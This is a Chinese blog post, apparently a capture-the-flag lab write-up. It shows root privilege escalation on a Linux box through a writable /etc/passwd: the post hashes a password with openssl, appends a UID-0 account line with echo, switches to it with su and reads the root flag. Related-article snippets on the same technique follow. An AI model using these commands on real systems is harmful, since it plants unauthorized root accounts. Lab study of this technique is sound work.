提权:可写的/etc/passwd创建用户提权

最新推荐文章于 2023-07-09 18:07:48 发布
最新推荐文章于 2023-07-09 18:07:48 发布
阅读量180 收藏
点赞数
文章标签: linux centos 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mysmycbx/article/details/130687002
版权

前提

brexit@misdirection:/tmp$ whoami
whoami
brexit
brexit@misdirection:/tmp$ ls -liah /etc/passwd
ls -liah /etc/passwd
153253 -rwxrwxr-- 1 roxx brexit 1.8K May 15 08:10 /etc/passwd

创建用户前的准备

brexit@misdirection:/tmp$ openssl passwd -1 123456
openssl passwd -1 123456
$1$/TjqfBNd$EFcF2nOIBWW3TzueYgzy6/

构造语句

superadmin:$1$/TjqfBNd$EFcF2nOIBWW3TzueYgzy6/:0:0:root:/root:/bin/bash

提权

brexit@misdirection:/tmp$ echo 'superadmin:$1$/TjqfBNd$EFcF2nOIBWW3TzueYgzy6/:0:0:root:/root:/bin/bash' >> /etc/passwd
<TzueYgzy6/:0:0:root:/root:/bin/bash' >> /etc/passwd
brexit@misdirection:/tmp$ su superadmin
su superadmin
Password: 123456

root@misdirection:/tmp# whoami
whoami
root
root@misdirection:/tmp# cat /root/root.txt
cat /root/root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
TryHardToKeep
关注
Linux利用passwd文件提权
weixin_45630387的博客
05-13 588
Linux 系统中的 /etc/passwd 文件,是系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作,如果有可写入权限,攻击者就可能写入一个任意权限的用户进去达到提权的目的。
详解Linux中/etc/passwd文件
weixin_43226231的博客
03-14 734
Linux/etc/passwd文件中每个用户都有一个对应的记录行,它记录了这个用户的一些基本属性。系统管理员经常会接触到这个文件的修改以完成对用户的管理工作。 它的内容类似下面的例子: 从上面的例子我们可以看到,/etc/passwd中一行记录对应着一个用户,每行记录又被冒号(:)分隔为7个字段,其格式和具体含义如下: 用户名:口令:用户标识号:组标识号:注释性描述:主目录:...
linux修改/etc/passwd文件添加用户要点,linux下添加删除,修改,查看用户和用户组...
weixin_42405368的博客
05-01 3190
一、组操作1、创建组:groupadd test #增加一个test组2、修改组groupmod -n test2 test #将test组的名子改成test23、删除组groupdel test2 #删除 组test24、查看组a),查看当前登录用户所在的组groups,查看apacheuser所在组groups apacheuserb),查看所有组cat /etc/groupc...
Linux提权之利用 /etc/passwd 文件
谢公子的博客
08-20 5695
当我们获得了某个Linux服务器的低权限之后,我们想要对该低权限账号进行提权,以执行更多的操作。 接下来我们的提权是利用 /etc/passwd文件的可写入权限,导致我们写入一个其他用户进去。 首先,查看 /etc/passwd的权限,发现任何用户都可以读写。 有关于 /etc/passwd文件里面数据的每个属性,传送门——>Linux下的用户和组 我们现在要做的就是自己...
/etc/passwd可写提权
最新发布
SAioas的博客
07-09 150
在靶机执行【cat /etc/passwd】将输出结果粘贴到kali名为passwd文件当中提权成功
linux修改/etc/passwd文件添加用户要点,linux中通过修改/etc/passwd,/etc/shadow,/etc/group创建用户...
weixin_39639381的博客
05-01 3281
目的:以root用户通过修改用户配置文件来为系统增加test1用户登陆root用户,创建test1用户密码为redhatvim /etc/passwd增加test1用户的信息注释:passwd中每个字段含义以冒号隔开1.用户名2.密码,隐藏的所以用x表示3.用户id,大于500,一般500以内的为系统用户使用4.用户组id5.用户注释可以为空6.用户家目录位置7.用户默认Shell3.为用户添加密...
Linux提权—/etc/passwd
qq_40898302的博客
04-11 3518
linxu提权
sudo提权和普通用户免密切换到root详细笔记
07-02
总结一下,`sudo` 提权和普通用户免密切换到root是通过编辑`/etc/sudoers`文件实现的,这包括为用户添加相应的权限行,如`shi ALL=(ALL) NOPASSWD: ALL`。在使用这种权限时,应考虑到安全性,只授予必要的权限,并...
Linux系统中用户管理,sudo提权详解
b_______的博客
10-08 329
前言 本章的学习目标为 Linux系统中的用户基础讲解 Linux系统中的用户的切换 Linux系统中的用户和组的管理和创建 Linux系统中用户认证管理 Linux系统中的权力下放 一、用户基础讲解 用户存在的意义 为了解决系统资源有限的问题,所以出现了用户 account 用户 author 认证 auth 授权 用户的存在在于系统中的底层安全机制的存在意义,被称之为aaa机制 用户和组的存在意义 组是一个逻辑容器,用于对于用户进行同意授权。同时进行对统一的用户
Linux使用suid vim.basic文件实现提权
09-14
总结来说,利用SUID的`vim.basic`实现提权,主要是通过修改`/etc/passwd`文件,添加一个具有root权限的新用户。这种方式在安全环境中是不允许的,但在渗透测试或漏洞分析中,了解这种提权方法有助于提升网络安全意识...
基本的系统安全控制
Arlssaze的博客
08-23 714
目录 前言 系统账号清理 将非登录用户的shell设为/sbin/nologin 锁定长期不使用的账号 删除无用账号 锁定账号文件passwd,shadow 命令历史限制 减少记录的命令条数 终端自动注销 su命令(Substitute User) 使用su命令切换用户 限制使用su命令的用户 sudo命令(提升执行权限) PAM安全认证 PAM认证原理 PAM的认证构成 PAM认证类型 PAM控制类型 总结 前言 在我们实际工作中为了防止被黑客攻击,我们往..
系统提权之:Unix 提权
f_carey的博客
08-28 932
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
Linux之用户信息文件 /etc/passwd 详解
美好事物
04-19 4154
用户和用户组管理-1.1用户信息文件 写在前面:自己写完检查可能会有所纰漏,读者们如若发现哪里有错误,可在下方留言或私信我,我会第一时间改正 ...
Linux——/etc/passwd文件(管理用户和组)
hutongkoudemihu的博客
06-25 5051
Linux系统是多用户多任务的分时操作系统,要能做到不同的用户能同时访问不同的文件,允许不同的用户从本地登录或远程登录,这时用户必须拥有一个合法的账号,Linux系统正是通过账号来实现对用户的访问进行控制的,因此,需要对用户与组进行有效的管理。用户的账号一方面能帮助系统管理员对使用系统的用户进行跟踪,并控制他们对系统资源的访问;另一方面也能帮助用户组织文件,并为用户提供安全性保护。每个用户账号都拥有一个唯一的用户名和用户口令。用户在登录时键入正确的用户名和口令后,才能进入系统和自己的主目录。
Linux 提权passwd
SHELLCODE_8BIT的博客
04-21 216
Linux提权passwd,shadow_mrx56的博客-CSDN博客
linux添加用户全过程
热门推荐
【雷克特】Recorred
07-05 3万+
一、/etc/passwd,各个字段内容的含义新增一个用户必然要了解一个用户各个字段的组成部分,如下图用户名:x密码占位符:UID:基本组ID:用户的注释信息:家目录:用户默认shellps:这里的x表示密码占位符,真正的密码在shadow中下图为/etc/shadow文件用户名:加密的密码:从1970.1.1到现在经过的天数:密码最少使用期限:密码最长使用期限:密码离过期多少天警告用户:密码的加...
【进行用户与用户组操作】
m0_73693938的博客
10-06 782
n回答:创建mike用户时,设置了用户id - 1010,然后创建alice时,没有设置用户id,那就自动编号1011,最后创建smith时,也没有设置用户id,那也是自动编号1012。每个用户都有一个用户组,系统可以对一个用户组中的所有用户进行集中管理。增加用户账号就是在/etc/passwd文件中为新用户增加一条记录,同时更新其他系统文件/etc/shadow,/etc/group等。创建用户mike,主目录为/home/mike,用户id为1010,密码为12345,注释my workmate。
linux提权~利用 /etc/passwd 文件
@小张小张的博客
09-27 6107
linux提权~利用 /etc/passwd 文件 该提权是利用 /etc/passwd 文件的可写入权限,我们可以写入一个其他用户进去。 1.查看 /etc/passwd 的权限 首先,查看 /etc/passwd 的权限,发现任何用户都可以执行读写权限。 命令: ls -lh /etc/passwd 文件权限的查看 使用 ls -lh 可以查看文件的具体信息,其中包括不同的用户对该文件的权限 (字符每3个一组(rwx),读(r)、写(w)、执行(x)) 2.记录行的基本属性 Lin
linux提权——passwd提权
tomyyyyy
04-14 3426
通过修改/etc/passwd提升权限 基础知识 /etc/passwd: 文件中的详细信息格式 用户名:代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(????,因为冒号在这里是分隔符。为了兼容起见,登录名中最好不要包含点字符(.),并且不使用连字符(-)和加号(+)打头。 口令:一些系统中,存放着加密后的用户口令字。虽然这个字段存放的只...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值